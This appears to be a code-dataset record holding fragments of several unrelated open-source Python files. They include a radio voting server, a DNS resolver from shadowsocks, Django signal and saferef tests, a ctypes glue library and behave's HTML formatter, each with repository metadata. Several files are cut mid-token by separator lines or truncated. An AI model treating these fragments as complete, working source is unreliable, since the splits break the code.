if row[0] < 1:
cur.execute("insert into UpVote (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0], 'likeAdded':'false', 'failedLikeReason':'You may only like a track once'}))
self.wfile.close()
#cur = con.cursor()
#cur.execute("insert into UpVote (TrackUri, DateVoted) values (?, date('now'))",(trackUri[0],))
#self.wfile.write('{0}({1})'.format('jsonpLikeTrackCallback', {'trackUriString':trackUri[0]}))
#self.wfile.close()
def voteToSkipTrack(self, trackUri, trackname, artist, album):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
today = datetime.datetime.now()
todayStr = "%s-%s-%s" % (today.year, today.month, today.day)
cur = con.cursor()
cur.execute("Select count(*) from votetoskip where HostAddress=:HostAddress AND TrackUri=:TrackUri AND DateVoted=date('now')", {"HostAddress": self.client_address[0], "TrackUri": trackUri[0]})
con.commit()
row = cur.fetchone()
print row[0]
if row[0] < 1:
cur.execute("insert into VoteToSkip (TrackUri, DateVoted, HostAddress, TrackName, Artist, Album) values (?, date('now'), ?, ?, ?, ?)",(trackUri[0],self.client_address[0],trackname[0], artist[0], album[0],))
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'true'}))
self.wfile.close()
else:
self.wfile.write('{0}({1})'.format('jsonpVoteToSkipTrackCallback', {'trackUriString':trackUri[0], 'voteAdded':'false', 'failedVoteReason':'Sorry you have exceeded your daily skipping quota for this track, but dont worry if the song is that bad Im sure someone else will click the button '}))
self.wfile.close()
def getTrackVotes(self, trackUri):
self.send_response(200)
self.send_header("Access-Control-Allow-Headers", "Authorization")
self.send_header('Access-Control-Allow-Origin', '*')
self.send_header('Content-type', 'application/json; charset=utf8')
self.end_headers()
if trackUri[0]:
con = lite.connect('db/radiopi.db')
with con:
cur = con.cursor()
cur.execute("SELECT COUNT(*) FROM VoteToSkip WHERE TrackUri=:TrackUri", {"TrackUri": trackUri[0],})
con.commit()
row = cur.fetchone()
print row[0]
self.wfile.write('{0}({1})'.format('jsonpGetTrackVotesCallbac
|
streamcorpus/streamcorpus-filter
|
py/src/streamcorpus_filter/_filter.py
|
Python
|
mit
| 8,706
| 0.005628
|
'''python example of filtering through strings from a
streamcorpus.StreamItem to find names from a FilterName
'''
from __future__ import absolute_import
import logging
import os
import sys
from cStringIO import StringIO
## import the thrift library
from thrift import Thrift
from thrift.transport.TTransport import TBufferedTransport
from thrift.protocol.TBinaryProtocol import TBinaryProtocol
## pure python TBinaryProtocol is slow, so attempt to replace it with
## faster implementation
from thrift.protocol.TBinaryProtocol import TBinaryProtocolAccelerated
fastbinary_import_failure = None
try:
from thrift.protocol import fastbinary
raise Exception() ## don't let this happen
## use faster C program to read/write
TBinaryProtocol = TBinaryProtocolAccelerated
except Exception, exc:
fastbinary_import_failure = exc
## fall back to pure python
## thrift message classes from core streamcorpus library
from streamcorpus import StreamItem, Rating, Label, Annotator, Offset, OffsetType, Target
## thrift message class from this package
from streamcorpus_filter.ttypes import FilterNames
logger = logging.getLogger(__name__)
class Filter(object):
def __init__(self):
self.filter_names = None
self._names = None
self.token_boundary_chars = set([' ', '\n', '\s', '\t', '\r'])
def load_filter_names(self, path_to_thrift_message):
'''reads a FilterNames message from a flat file
'''
if not os.path.exists(path_to_thrift_message):
raise Exception('path does not exist: %r' % path_to_thrift_message)
fh = open(path_to_thrift_message, 'rb')
# This is a lame workaround to a bug in Thrift experienced
# during unit tests. Thrift cannot handle files in
# non-blocking mode that could return from .read() with less
# than the asked for data. read(-1) seems to force reading all
# the data, and once we have it all in memory it is safe for
# Thrift to read it.
raw = fh.read(-1)
logger.debug('read %s bytes of %r', len(raw), path_to_thrift_message)
fh = StringIO(raw)
i_transport = TBufferedTransport(fh)
i_protocol = TBinaryProtocol(i_transport)
self.filter_names = FilterNames()
self.filter_names.read(i_protocol)
## not actually required in CPython
fh.close()
def save_filter_names(self, path_to_thrift_message=None, file_obj=None):
'''writes a FilterNames message to a flat file
'''
if path_to_thrift_message:
if os.path.exists(path_to_thrift_message):
print('warning: overwriting: %r' % path_to_thrift_message)
o_transport = open(path_to_thrift_message, 'wb')
elif file_obj:
o_transport = file_obj
else:
raise Exception('must specify either path_to_thrift_message or file_obj')
o_protocol = TBinaryProtocol(o_transport)
self.filter_names.write(o_protocol)
o_transport.close()
def invert_filter_names(self):
'''constructs FilterNames.name_to_target_ids from
FilterNames.target_id_to_names
'''
if self.filter_names.name_to_target_ids:
print('warning: replacing existing FilterNames.name_to_target_ids')
self.filter_names.name_to_target_ids = dict()
for target_id in self.filter_names.target_id_to_names:
for name in self.filter_names.target_id_to_names[target_id]:
if name not in self.filter_names.name_to_target_ids:
self.filter_names.name_to_target_ids[name] = list()
self.filt
|
er_names.name_to_target_ids[name].append(target_id)
print('%d names, %d target_ids' % (len(self.filter_names.name_to_target_ids),
len(self.filter_names.target_id_to_names)))
def compile_filters(self):
if not self.filter_names:
raise Exception('must first load FilterNames')
## f
|
or this simple example, all we do is convert the utf-8
## from FilterNames into unicode
self._names = dict()
for name in self.filter_names.name_to_target_ids:
self._names[name.decode('utf8')] = self.filter_names.name_to_target_ids[name]
def register_token_boundary_char(self, char):
'''
add a unicode character to the set of symbols consider
equivalent to "token boundary"
'''
self.token_boundary_chars.add(char)
def advance_passed_boundary(self):
'''
advanced self.text_position passed the current boundary, if
possible, and detect if a token boundary was passed.
'''
start_text_position = self.text_position
while self.text_position < len(self.text) and self.text[self.text_position] in self.token_boundary_chars:
self.text_position += 1
if self.text_position == len(self.text):
return False
elif start_text_position != self.text_position:
## consumed some characters, so we must have reached a new token
return True
elif self.text_position == 0:
## special case for start of document
return True
else:
## have not passed a boundary
return False
def advance_to_boundary(self):
'''
advanced self.text_position to the next boundary or end of self.text
'''
while self.text_position < len(self.text) and self.text[self.text_position] not in self.token_boundary_chars:
self.text_position += 1
def apply_filters(self, stream_item, content_form='clean_html'):
'''iterates over the characters in stream_item.body.<content_form>
looking for strings that exact match keys in
self.filter_names.name_to_target_ids'''
if not self._names:
raise Exception('must first have a compiled set of filters')
annotator_id = 'streamcorpus-filter'
annotator = Annotator(annotator_id=annotator_id)
text = getattr(stream_item.body, content_form)
## pass text around by reference as a property on this class instance
self.text = text.decode('utf8')
## inefficient brute force loop for each name
for name in self._names:
name_tokens = name.split('\\W')
name_token_i = 0
self.text_position = 0
first_char_position = None
while name_tokens and self.text_position < len(self.text):
#print 'starting', self.text_position, name_token_i, name_tokens
reached_start_of_new_token = self.advance_passed_boundary()
if not reached_start_of_new_token:
self.advance_to_boundary()
continue
name_tok = name_tokens[name_token_i]
#print 'on a token', self.text_position, name_token_i, name_tok, self.text[self.text_position:self.text_position + len(name_tok)]
if name_tok != self.text[self.text_position : self.text_position + len(name_tok)]:
name_token_i = 0
first_char_position = None
self.text_position += 1
else:
name_token_i += 1
self.text_position += len(name_tok)
if first_char_position is None:
first_char_position = self.text_position
if name_token_i == len(name_tokens):
print 'found one!'
## reset state machine for next possible match in this document
name_token_i = 0
for target_id in self._names[name]:
target = Target(target_id=target_id)
rating = Rating(annotator=annotator, target=target)
label = Label( annotator=annotator, target=target)
label.offsets[OffsetType.CHARS] = Offset(
type=OffsetType.CHARS,
|
plus1s/shadowsocks-py-mu
|
shadowsocks/asyncdns.py
|
Python
|
apache-2.0
| 17,651
| 0.00017
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import sys
import os
import socket
import struct
import re
import logging
from shadowsocks import common, lru_cache, eventloop, shell
CACHE_SWEEP_INTERVAL = 30
VALID_HOSTNAME = re.compile(br"(?!-)[_A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
common.patch_socket()
# rfc1035
# format
# +---------------------+
# | Header |
# +---------------------+
# | Question | the question for the name server
# +---------------------+
# | Answer | RRs answering the question
# +---------------------+
# | Authority | RRs pointing toward an authority
# +---------------------+
# | Additional | RRs holding additional information
# +---------------------+
#
# header
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ID |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# |QR| Opcode |AA|TC|RD|RA| Z | RCODE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | QDCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ANCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | NSCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | ARCOUNT |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
QTYPE_ANY = 255
QTYPE_A = 1
QTYPE_AAAA = 28
QTYPE_CNAME = 5
QTYPE_NS = 2
QCLASS_IN = 1
def build_address(address):
address = address.strip(b'.')
labels = address.split(b'.')
results = []
for label in labels:
l = len(label)
if l > 63:
return None
results.append(common.chr(l))
results.append(label)
results.append(b'\0')
return b''.join(results)
def build_request(address, qtype):
request_id = os.urandom(2)
header = struct.pack('!BBHHHH', 1, 0, 1, 0, 0, 0)
addr = build_address(address)
qtype_qclass = struct.pack('!HH', qtype, QCLASS_IN)
return request_id + header + addr + qtype_qclass
def parse_ip(addrtype, data, length, offset):
if addrtype == QTYPE_A:
return socket.inet_ntop(socket.AF_INET, data[offset:offset + length])
elif addrtype == QTYPE_AAAA:
return socket.inet_ntop(socket.AF_INET6, data[offset:offset + length])
elif addrtype in [QTYPE_CNAME, QTYPE_NS]:
return parse_name(data, offset)[1]
else:
return data[offset:offset + length]
def parse_name(data, offset):
p = offset
labels = []
l = common.ord(data[p])
while l > 0:
if (l & (128 + 64)) == (128 + 64):
# pointer
pointer = struct.unpack('!H', data[p:p + 2])[0]
pointer &= 0x3FFF
r = parse_name(data, pointer)
labels.append(r[1])
p += 2
# pointer is the end
return p - offset, b'.'.join(labels)
else:
labels.append(data[p + 1:p + 1 + l])
p += 1 + l
l = common.ord(data[p])
return p - offset + 1, b'.'.join(labels)
# rfc1035
# record
# 1 1 1 1 1 1
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | |
# / /
# / NAME /
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TYPE |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | CLASS |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | TTL |
# | |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
# | RDLENGTH |
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--|
# / RDATA /
# / /
# +--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+--+
def parse_record(data, offset, question=False):
nlen, name = parse_name(data, offset)
if not question:
record_type, record_class, record_ttl, record_rdlength = struct.unpack(
'!HHiH', data[offset + nlen:offset + nlen + 10]
)
ip = parse_ip(record_type, data, record_rdlength, offset + nlen + 10)
return nlen + 10 + record_rdlength, \
(name, ip, record_type, record_class, record_ttl)
else:
record_type, record_class = struct.unpack(
'!HH', data[offset + nlen:offset + nlen + 4]
)
return nlen
|
+ 4, (name, None, record_type, record_class, None, None)
def parse_header(data):
if len(data) >= 12:
header = struct.unpack('!HBBHHHH', data[:12])
res_id = header[0]
res_qr = header[1] & 128
res_tc = header[1] & 2
res_ra = header[2] & 128
|
res_rcode = header[2] & 15
# assert res_tc == 0
# assert res_rcode in [0, 3]
res_qdcount = header[3]
res_ancount = header[4]
res_nscount = header[5]
res_arcount = header[6]
return (res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount,
res_ancount, res_nscount, res_arcount)
return None
def parse_response(data):
try:
if len(data) >= 12:
header = parse_header(data)
if not header:
return None
res_id, res_qr, res_tc, res_ra, res_rcode, res_qdcount, \
res_ancount, res_nscount, res_arcount = header
qds = []
ans = []
offset = 12
for i in range(0, res_qdcount):
l, r = parse_record(data, offset, True)
offset += l
if r:
qds.append(r)
for i in range(0, res_ancount):
l, r = parse_record(data, offset)
offset += l
if r:
ans.append(r)
for i in range(0, res_nscount):
l, r = parse_record(data, offset)
offset += l
for i in range(0, res_arcount):
l, r = parse_record(data, offset)
offset += l
response = DNSResponse()
if qds:
response.hostname = qds[0][0]
for an in qds:
response.questions.append((an[1], an[2], an[3]))
for an in ans:
response.answers.append((an[1], an[2], an[3]))
return response
except Exception as e:
shell.print_exception(e)
return None
def is_valid_hostname(hostname):
if len(hostname) > 255:
return False
if hostname[-1] == b'.':
hostname = hostname[:-1]
return all(VALID_HOSTNAME.match(x) for x in hostname.split(b'.'))
class DNSResponse(object):
def __init__(self):
self.hostname = None
self.questions = [] # each: (addr, type, class)
self.answers = [] # each: (addr, type, class)
def __str__(self):
return '%s: %s' % (self.hostname, str(self.answers))
STATUS_FIRST = 0
STATUS_SECOND = 1
class DNSResolver(objec
|
thoas/django-sequere
|
sequere/contrib/timeline/signals.py
|
Python
|
mit
| 279
| 0
|
from django.dispatch import Signal
pre_save = Signal(providing_args=['instance', 'action', ])
post_save = Signal(providing_a
|
rgs=['instance', 'action', ])
pre_delete = Signal(providing_args=['instance', 'action', ]
|
)
post_delete = Signal(providing_args=['instance', 'action', ])
|
okfn/brand-manager
|
manager/apps/brand/notifications.py
|
Python
|
mit
| 1,306
| 0
|
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
class EmailNotification:
msg_from = 'OKFN team <noreply@okfn.org>'
def __init__(self, msg_to, msg_from=None):
self.msg_to = msg_to
if msg_from:
self.msg_from = msg_from
def send_mail(self, subject, messag
|
e):
send_mail(subject, message, self.msg_from, [self.msg_to],
fail_silently=True)
def create_notification(self, brand_nm, bsin):
brand_url = reverse('brand', args=(bsin,))
subject = "%s added to the OKFN brand repository" % brand_nm
message
|
= """Dear contributor,
Your brand %s was added to the OKFN brand respository under BSIN %s.
More details at http://product.okfn.org%s .
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, bsin, brand_url)
self.send_mail(subject, message)
def delete_notification(self, brand_nm, comment):
subject = "%s rejected from OKFN brand repository" % brand_nm
message = """Dear contributor,
Your brand proposal for %s was rejected from the OKFN brand respository.
Moderator comment : %s
Thank you for your contribution.
Regards,
OKFN brand manager team""" % (brand_nm, comment)
self.send_mail(subject, message)
|
Beeblio/django
|
tests/dispatch/tests/test_saferef.py
|
Python
|
bsd-3-clause
| 1,886
| 0
|
import unittest
from django.dispatch.saferef import safeRef
from django.utils.six.moves import xrange
class Test1(object):
def x(self):
pass
def test2(obj):
pass
class Test2(object):
def __call__(self, obj):
pass
class SaferefTests(unittest.TestCase):
def setUp(self):
ts = []
ss = []
for x in xrange(5000):
t = Test1()
ts.append(t)
s = safeRef(t.x, self._closure)
ss.append(s)
ts.append(test2)
ss.append(safeRef(test2, self._closure))
for x in xrange(30):
t = Test2()
ts.append(t)
s = safeRef(t, self._closure)
ss.append(s)
self.ts = ts
self.ss =
|
ss
self.closureCount = 0
def tearDown(self):
del self.ts
del self.ss
def testIn(self):
"""Test the "in" operator for safe references (cmp)"""
for t in self.ts[:50]:
self.assertTrue(safeRef(t.x) in self.ss)
def testValid(self):
|
"""Test that the references are valid (return instance methods)"""
for s in self.ss:
self.assertTrue(s())
def testShortCircuit(self):
"""Test that creation short-circuits to reuse existing references"""
sd = {}
for s in self.ss:
sd[s] = 1
for t in self.ts:
if hasattr(t, 'x'):
self.assertTrue(safeRef(t.x) in sd)
else:
self.assertTrue(safeRef(t) in sd)
def testRepresentation(self):
"""Test that the reference object's representation works
XXX Doesn't currently check the results, just that no error
is raised
"""
repr(self.ss[-1])
def _closure(self, ref):
"""Dumb utility mechanism to increment deletion counter"""
self.closureCount += 1
|
DLR-SC/F2x
|
src/F2x/template/ctypes_noerr/lib/glue.py
|
Python
|
apache-2.0
| 17,616
| 0.0021
|
# Copyright 2018 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
F2x 'ctypes' template glue library.
This module contains helpers that are used by the code generated by the 'ctypes' library. It mainly deals with setting
correct C interfaces and converting values between FORTRAN and Python types. Arrays are handled by NumPy.
Usually there should be no need to access this module directly.
"""
import ctypes
import numpy
def constructor(cfunc):
"""
Make a C function a constructor.
The C interface is defined to accept no parameters and return a void pointer. It is also wrapped as a staticmethod
to allow usage in classes.
:param cfunc: The plain C function as imported from the C library using ctypes.
:return: A static method with appropriate C interface.
"""
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
return staticmethod(cfunc)
def destructor(cfunc):
"""
Make a C function a destructor.
Destructors accept pointers to void pointers as argument. They are also wrapped as a staticmethod for usage in
classes.
:param cfunc: The C function as imported by ctypes.
:return: The configured destructor.
"""
cfunc.argtypes = [ctypes.POINTER(ctypes.c_void_p)]
cfunc.restype = None
return staticmethod(cfunc)
def array_from_pointer(ctype, dims, ptr, strlen=None, dealloc=None):
"""
Helper that converts a pointer to a ctypes array.
The array will have flat layout.
:param ctype: Type of the contents of the array.
:param dims: List with the current sizes of the array.
:param ptr: Address of array memory.
:return: A ctypes array that points to the referred data.
"""
class ManagedArray(numpy.ndarray):
def __array_finalize__(self, obj):
if isinstance(obj, ManagedArray):
self.f2x_parent = obj
def __del__(self):
if hasattr(self, 'f2x_ptr'):
array_size = ctypes.c_int(len(self))
self.f2x_dealloc(ctypes.byref(array_size), ctypes.byref(self.f2x_ptr))
array_size = 1
for size in dims:
array_size *= size
array_type = ctype * array_size
c_array = array_type.from_address(ctypes.addressof(ptr.contents))
if strlen is None:
array = numpy.ctypeslib.as_array(c_array, dims)
else:
array = numpy.char.array(c_array, itemsize=strlen, copy=False, order='F')
if dealloc is not None:
array = array.view(ManagedArray)
array.f2x_dealloc = dealloc
array.f2x_ptr = ptr
return array
class NullPointerError(BaseException):
"""
This exception is raised when Python wrapper code tries to access a C pointer that was not (yet) allocated (i.e. is
null). This exception is handled to automatically allocate dynamic arrays upon first assignment.
"""
pass
def _getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctypes.c_void_p
def _get(ptr):
cptr = cfunc(ptr)
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get(ptr):
cptr = ctypes.c_char_p(0)
cfunc(ptr, ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = ctype
return cfunc
def _setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ptr, ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(ptr, value):
cvalue = ctype(value)
cfunc(ptr, ctypes.byref(cvalue))
return _set
def _allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = [ctypes.c_void_p]
cfunc.restype = None
return cfunc
class Field(object):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _getter(ctype, getter)
self.setter = _setter(ctype, setter, strlen)
self.allocator = _allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
return self.getter(instance.ptr)
def __set__(self, instance, value):
if self.setter:
self.setter(instance.ptr, value)
elif issubclass(self.ctype, FType):
try:
target = self.getter(instance.ptr)
except NullPointerError:
self.allocator(instance.ptr)
target = self.getter(instance.ptr)
target.copy_from(value)
else:
raise AttributeError("Not settable.")
def _global_getter(ctype, cfunc):
if issubclass(ctype, FType):
cfunc.argtypes = []
cfunc.restype = ctypes.c_void_p
def _get():
cptr = cfunc()
if cptr is None:
raise NullPointerError()
return ctype(ctypes.c_void_p(cptr), False)
return _get
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctypes.c_char_p)]
cfunc.restype = None
def _get()
|
:
cptr = ctypes.c_char_p(0)
cfunc(ctypes.byref(cptr))
return cptr.value.decode('utf-8').rstrip()
return _get
else:
cfunc.argtypes = []
cfunc.restype = ctype
return cfunc
def _
|
global_setter(ctype, cfunc, strlen=None):
if cfunc is None:
return None
elif ctype == ctypes.c_char_p:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cstring = ctypes.create_string_buffer(value.encode('utf-8'), strlen)
cvalue = ctypes.cast(cstring, ctypes.c_char_p)
cfunc(ctypes.byref(cvalue))
return _set
else:
cfunc.argtypes = [ctypes.POINTER(ctype)]
cfunc.restype = None
def _set(value):
cvalue = ctype(value)
cfunc(ctypes.byref(cvalue))
return _set
def _global_allocator(ctype, cfunc):
if cfunc is None:
return None
cfunc.argtypes = []
cfunc.restype = None
return cfunc
class Global(Field):
def __init__(self, ctype, getter, setter=None, allocator=None, strlen=None):
self.ctype = ctype
self.getter = _global_getter(ctype, getter)
self.setter = _global_setter(ctype, setter, strlen)
self.allocator = _global_allocator(ctype, allocator)
def __get__(self, instance, owner):
if instance is None:
return self
try:
return self.getter()
except NullPointerError:
self.allocator()
return self.getter()
def __set__(self, instance, value):
if self.setter:
self.setter(value)
eli
|
kymbert/behave
|
behave/formatter/html.py
|
Python
|
bsd-2-clause
| 15,092
| 0.001789
|
# -*- coding: utf-8 -*-
"""
Creates a very basic one-page html file for reporting a test run.
"""
from __future__ import absolute_import
from behave.formatter.base import Formatter
from behave.formatter.css import BasicTheme
from behave.compat.collections import Counter
import xml.etree.ElementTree as ET
import base64
def _valid_XML_char_ordinal(i):
return ( # conditions ordered by presumed frequency
0x20 <= i <= 0xD7FF
or i in (0x9, 0xA, 0xD)
or 0xE000 <= i <= 0xFFFD
or 0x10000 <= i <= 0x10FFFF
)
def ET_tostring(elem, pretty_print=False):
text = ET.tostring(elem, "utf-8")
if pretty_print:
pass
return text
class JavaScriptLibrary(object):
collapsible = """
function collapsible_toggle(id)
{
var elem = document.getElementById(id);
elem.style.display = (elem.style.display == 'none' ? 'block' : 'none');
return false;
}
function collapsible_expandAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'block';
i++
}
}
function collapsible_collapseAll(className)
{
var elems = document.getElementsByClassName(className);
var i = 0;
while (i != elems.length)
{
elems[i].style.display = 'none';
i++
}
}
"""
class Page(object):
"""
Provides a HTML page construct (as technological layer).
XXX
"""
theme = BasicTheme
def __init__(self, title=None):
pass
# -----------------------------------------------------------------------------
# CLASS: HTMLFormatter
# -----------------------------------------------------------------------------
class HTMLFormatter(F
|
ormatter):
"""
Provides a single-page HTML formatter that writes the result of a test run.
"""
name = 'html'
description = 'Basic HTML formatter'
title = u"Behave Test Report"
def __init__(self, stream_opener, config):
super(HTMLFormatter, self).__init__(stream_opener,
|
config)
# -- XXX-JE-PREPARED-BUT-DISABLED:
# XXX Seldom changed value.
# XXX Should only be in configuration-file in own section "behave.formatter.html" ?!?
# XXX Config support must be provided.
# XXX REASON: Don't clutter behave config-space w/ formatter/plugin related config data.
# self.css = self.default_css
# if config.css is not None:
# self.css = config.css
self.html = ET.Element('html')
head = ET.SubElement(self.html, 'head')
ET.SubElement(head, 'title').text = self.title
ET.SubElement(head, 'meta', {'content': 'text/html;charset=utf-8'})
style = ET.SubElement(head, 'style', type=u"text/css")
style.text = Page.theme.stylesheet_text
# style.append(ET.Comment(Page.theme.stylesheet_text))
script = ET.SubElement(head, 'script', type=u"text/javascript")
script.text = JavaScriptLibrary.collapsible
# script_text = ET.Comment(JavaScriptLibrary.collapsible)
# script.append(script_text)
self.stream = self.open()
body = ET.SubElement(self.html, 'body')
self.suite = ET.SubElement(body, 'div', {'class': 'behave'})
#Summary
self.header = ET.SubElement(self.suite, 'div', id='behave-header')
label = ET.SubElement(self.header, 'div', id='label')
ET.SubElement(label, 'h1').text = self.title
summary = ET.SubElement(self.header, 'div', id='summary')
totals = ET.SubElement(summary, 'p', id='totals')
self.current_feature_totals = ET.SubElement(totals, 'p', id='feature_totals')
self.scenario_totals = ET.SubElement(totals, 'p', id='scenario_totals')
self.step_totals = ET.SubElement(totals, 'p', id='step_totals')
self.duration = ET.SubElement(summary, 'p', id='duration')
# -- PART: Expand/Collapse All
expand_collapse = ET.SubElement(summary, 'div', id='expand-collapse')
expander = ET.SubElement(expand_collapse, 'a', id='expander', href="#")
expander.set('onclick', "collapsible_expandAll('scenario_steps')")
expander.text = u'Expand All'
cea_spacer = ET.SubElement(expand_collapse, 'span')
cea_spacer.text = u" | "
collapser = ET.SubElement(expand_collapse, 'a', id='collapser', href="#")
collapser.set('onclick', "collapsible_collapseAll('scenario_steps')")
collapser.text = u'Collapse All'
self.embed_id = 0
self.embed_in_this_step = None
self.embed_data = None
self.embed_mime_type = None
self.scenario_id = 0
def feature(self, feature):
if not hasattr(self, "all_features"):
self.all_features = []
self.all_features.append(feature)
self.current_feature = ET.SubElement(self.suite, 'div', {'class': 'feature'})
if feature.tags:
tags_element = ET.SubElement(self.current_feature, 'span', {'class': 'tag'})
tags_element.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), feature.tags)
h2 = ET.SubElement(self.current_feature, 'h2')
feature_element = ET.SubElement(h2, 'span', {'class': 'val'})
feature_element.text = u'%s: %s' % (feature.keyword, feature.name)
if feature.description:
description_element = ET.SubElement(self.current_feature, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), feature.description)
def background(self, background):
self.current_background = ET.SubElement(self.suite, 'div', {'class': 'background'})
h3 = ET.SubElement(self.current_background, 'h3')
ET.SubElement(h3, 'span', {'class': 'val'}).text = \
u'%s: %s' % (background.keyword, background.name)
self.steps = ET.SubElement(self.current_background, 'ol')
def scenario(self, scenario):
if scenario.feature not in self.all_features:
self.all_features.append(scenario.feature)
self.scenario_el = ET.SubElement(self.suite, 'div', {'class': 'scenario'})
scenario_file = ET.SubElement(self.scenario_el, 'span', {'class': 'scenario_file'})
scenario_file.text = "%s:%s" % (scenario.location.filename, scenario.location.line)
if scenario.tags:
tags = ET.SubElement(self.scenario_el, 'span', {'class': 'tag'})
tags.text = u'@' + reduce(lambda d, x: "%s, @%s" % (d, x), scenario.tags)
self.scenario_name = ET.SubElement(self.scenario_el, 'h3')
span = ET.SubElement(self.scenario_name, 'span', {'class': 'val'})
span.text = u'%s: %s' % (scenario.keyword, scenario.name)
if scenario.description:
description_element = ET.SubElement(self.scenario_el, 'pre', {'class': 'message'})
description_element.text = reduce(lambda d, x: "%s\n%s" % (d, x), scenario.description)
self.steps = ET.SubElement(self.scenario_el, 'ol',
{'class': 'scenario_steps',
'id': 'scenario_%s' % self.scenario_id})
self.scenario_name.set("onclick",
"collapsible_toggle('scenario_%s')" % self.scenario_id)
self.scenario_id += 1
def scenario_outline(self, outline):
self.scenario(self, outline)
self.scenario_el.set('class', 'scenario outline')
def match(self, match):
self.arguments = match.arguments
if match.location:
self.location = "%s:%s" % (match.location.filename, match.location.line)
else:
self.location = "<unknown>"
def step(self, step):
self.arguments = None
self.embed_in_this_step = None
self.last_step = step
def result(self, result):
self.last_step = result
step = ET.SubElement(self.steps, 'li', {'class': 'step %s' % result.status})
step_name = ET.SubElement(step, 'div', {'class': 'step_name'})
keyword = ET.SubElement(step_name, 'span', {'class': 'keyword'})
keyword.text = result.keyword + u' '
if self.argume
|
zack-bitcoin/forumcoin
|
networking.py
|
Python
|
gpl-3.0
| 1,788
| 0.009508
|
import socket, subprocess, re, tools, custom
#This file explains how sockets work for networking.
MAX_MESSAGE_SIZE = 60000
def kill_processes_using_ports(ports):
popen = subprocess.Popen(['netstat', '-lpn'],
shell=False,
stdout=subprocess.PIPE)
(data, err) = popen.communicate()
pattern = "^tcp.*((?:{0})).* (?P<pid>[0-9]*)/.*$"
pattern = pattern.format(')|(?:'.join(ports))
prog = re.compile(pattern)
for line in data.split('\n'):
match = re.match(prog, line)
if match:
pid = match.group('pid')
